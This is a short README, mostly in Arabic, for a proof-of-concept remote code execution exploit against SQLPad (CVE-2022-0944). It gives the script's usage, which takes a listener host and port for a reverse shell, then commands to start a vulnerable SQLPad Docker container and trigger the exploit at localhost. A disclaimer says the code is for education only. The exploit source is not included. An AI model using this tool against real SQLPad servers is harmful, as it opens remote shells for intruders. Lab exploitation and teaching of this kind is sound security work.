
استغلال لإثبات المفهوم لـ SQLPad RCE (CVE-2022-0944).
استغلال لإثبات المفهوم لثغرة SQLPad RCE (CVE-2022-0944)
usage: main.py [-h] url lhost lport [username] [password]
positional arguments:
url URL to SQLPad
lhost Listener host address for reverse shell
lport Listener port for reverse shell
username login username (optional)
password login password (optional)
options:
-h, --help show this help message and exit
مثال:
# install requirements
pip install -r requirements.txt
# start sqlpad docker container
docker run -p 3000:3000 --name sqlpad -d --env SQLPAD_ADMIN=admin --env SQLPAD_ADMIN_PASSWORD=admin sqlpad/sqlpad:6.10.0
# trigger exploit
./main.py http://localhost:3000 127.0.0.1 1337 admin admin
يحتوي هذا المستودع على أكواد وأدوات مخصّصة للأغراض التعليمية فقط، وتحديدًا للاستخدام في دورات الأمن السيبراني وبيئات التعلّم. لا يتحمّل مؤلف هذا الكود أي مسؤولية عن أي عواقب تنجم عن استخدام هذا الكود أو إساءة استخدامه أو تعديله. يُقدَّم الكود «كما هو» دون أي ضمان، صريحًا كان أو ضمنيًا، بما في ذلك على سبيل المثال لا الحصر الضمانات الضمنية المتعلقة بقابلية التسويق أو الملاءمة لغرض معيّن.